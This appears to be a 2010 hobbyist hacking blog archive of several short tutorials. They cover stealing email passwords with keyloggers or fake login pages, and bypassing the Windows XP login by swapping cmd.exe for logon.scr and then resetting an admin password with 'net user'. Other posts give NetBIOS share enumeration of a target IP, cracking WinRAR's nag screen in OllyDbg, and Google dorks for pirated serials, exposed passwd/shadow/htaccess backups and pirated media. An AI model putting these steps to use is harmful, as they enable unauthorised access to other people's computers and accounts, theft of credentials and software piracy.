Posts

Showing posts from 2010

Who is a hacker?

Definition of Hacker: A hacker is a person who breaks into computers and computer networks, either for profit or motivated by the challenge.----Wikipedia. There are 3 catagories of hacker: 1) White Hat 2) Black hat 3) Grey Hat White hat hackers are the Good guys who don't use their skill for illegal purpose. Black Hat hacker are the bad guys who use their skill for illegal purpose, They use their skill maliciously  for personal gain. Grey hat hacker are combination of black and white hat, they hack into system for solely notifying that system has been hacked. Script kiddies – These are the wannabe hackers. They are the people that make hackers look bad. they do not  have any hacking skills and use the tools developed by other hackers without any knowledge of what’s happening behind the scenes. Intermediate hackers – These people know about computers and have enough computing skill to understand what a script can do. But like script Kiddies, they use tools and exploit

How to Hack Email

Facts about email hacking.......... 1. There is no ready made software that can hack emails and get you the password just with a click of a button. 2. Never trust any email hacking service that claims to hack any email. Most of them are no more than a scam. 3. There exists only 2 foolproof methods for hacking email. All the other methods are simply scam or don’t work.  A.)Keylogger  B.)Fake login page  1.KEYLOGGER It is a small piece of software which reside on your pc and silently monitor each keystroke thats a user type on a typical computer keyboard. 2.FAKE LOGIN PAGE A fake login page is a page which looks alike the login page of a site. And if anyone logs in through the fake login page, his/her account information is logged in a file and the hacker or the creator of the fake login page retrieves that information.

Windows Hacking

WINDOWS TIPS COLLECTION How to hack windows XP admin password If you log into a limited account on your target machine and open up a dos prompt then enter this set of commands Exactly: cd\ *drops to root cd\windows\system32 *directs to the system32 dir mkdir temphack *creates the folder temphack copy logon.scr temphack\logon.scr *backsup logon.scr copy cmd.exe temphack\cmd.exe *backsup cmd.exe del logon.scr *deletes original logon.scr rename cmd.exe logon.scr *renames cmd.exe to logon.scr exit *quits dos Now what you have just done is told the computer to backup the command program and the screen saver file, then edits the settings so when the machine boots the screen saver you will get an unprotected dos prompt with out logging into XP. Once this happens if you enter this command minus the quotes "net user password" If the Administrator Account is called Frank and you want the password blah enter this "net user Frank blah" and this chan

SYSTEM INTRUSION IN 15 SECONDS

This is called a Netbios attack. Nbstat –A EX: nbstat –A 192.168.1.4 It check connection status of an ip address, scan on a range of IP address for systems with “File and Printer Sharing” turned on. This will give you a result that looks like this NetBIOS Remote Machine Name Table ____________________________________ Name Type Status ------------------------------------------- J-1 <00> UNIQUE Registered WORK <00> GROUP Registered J-1 <03> UNIQUE Registered J-1 <20> UNIQUE Registered WORK <1E> GROUP Registered WORK <1D> UNIQUE Registered A hex code of <20> means you have file and printer sharing turned on. The next step would be to find out what is being shared. This is how: Net view \\ EX:net view \\192.168.1.4 We get a response that looks something like this. Shared resources at \\192.168.1.4 Sharename               Type Comment MY DOCUMENTS           Disk TEMP                         Disk The command was completed successfully. This show

HOW TO CRACK WINRAR USING OLLYDBG

Winrar always show us a reminder saying “Please purchase Winrar licence” at the every startup of winrar, it’s irritating. It notify our trial/ evaluation period. It can be patch using ollydbg. I will tell u how.   Open ollydbg and open winrar in it. Now search for text string. “Reminder”. To do so right click in olldbg and search for All referenced text sting. A new window [Text strings referenced in winRAR::text] will open, right click on in that and click Search for text .Now a search box open enter reminder there. Now that we got that code that display REMINDER, double click on that it will take u to the mian program code. Now look for jump just before the code starts. There is jump JE SHORT 00441219,if we follow the jump lets see where it goes, to do this simply press Enter on the jump. Lets change jump from JE SHORT 00441219 to JMP SHORT 00441219 so that it noe becomes JUMP instead of JUMP EQUAL. To do that double click on that statement and change it. Then click Assembl

Using google as proxy

Here I describe what I believe is an uncommon way for bypassing blocked sites using google. 1: The first and most common way of using google to bypass blocked sites is just to search for the site and then clicked the “cached” link that appears on google. Easy, simple, and frequently works for static information. 2: Passing the site through google translator works well as well. Here’s the URL to use: http://www.google.com/translate?langpair=en|en&u= www.blockedsite.com (where blockedsite.com is the site that you wish to visit) This translates the site from english to english and works because the ip address will appear as google instead of you. You can actually do this with any langpair. Change en|en in the URL above to spanish by using es|es and it still works. 3: My unique method that I have not seen described before is to search through google mobile. http://www.google.com/xhtml Google mobile will “convert as you go” very similiar to the translation meth

MORE GOOGLE HACK....

Serial Numbers • Let's pretend you need a serial number for Windows XP Pro. • In the Google search bar type in just like this - "Windows XP Professional" 94FBR • the key is the 94FBR code.. it was included with many MS Office registration codes so this will help you dramatically reduce the amount of 'fake' sites (usually pornography) that trick you. • or if you want to find the serial for WinZip 8.1 - "WinZip 8.1" 94FBR Passwords in backup files • filetype:bak inurl:"htaccess|passwd|shadow|htusers" This will search for backup files (*.bak) created by some editors or even by the administrator himself (before activating a new version). Every attacker knows that changing the extension of a file on a web server can have ugly consequences Listings of what you want • change the word after the parent directory to what you want • "parent directory " DVDRip -xxx -html -htm -php -shtml -opendivx -md5 -md5sums • "

Using google a a hacking tool

To search file of different type The filetype: operator instructs Google to search only within the text of a particular type of file. The file type to search must be supplied after the colon. Don't include a period before the file extension. File type u can search: • Adobe Portable Document Format (pdf) • Adobe PostScript (ps) • Lotus 1-2-3 (wk1, wk2, wk3, wk4, wk5, wki, wks, wku) • MacWrite (mw) • Microsoft Excel (xls) • Microsoft PowerPoint (ppt) • Microsoft Word (doc) • Microsoft Works (wks, wps, wdb) • Microsoft Write (wri) • Rich Text Format (rtf) • Shockwave Flash (swf) • Text (ans, txt) • And many more… . Directory Listings • Directory Listings – Show server version information • Useful for an attacker – intitle:index.of server.at – intitle:index.of server.at site:aol.com • Finding Directory Listings – intitle:index.of "parent directory" – intitle:index.of name size Music • You only need add the name of the song/artist/singer. • Exam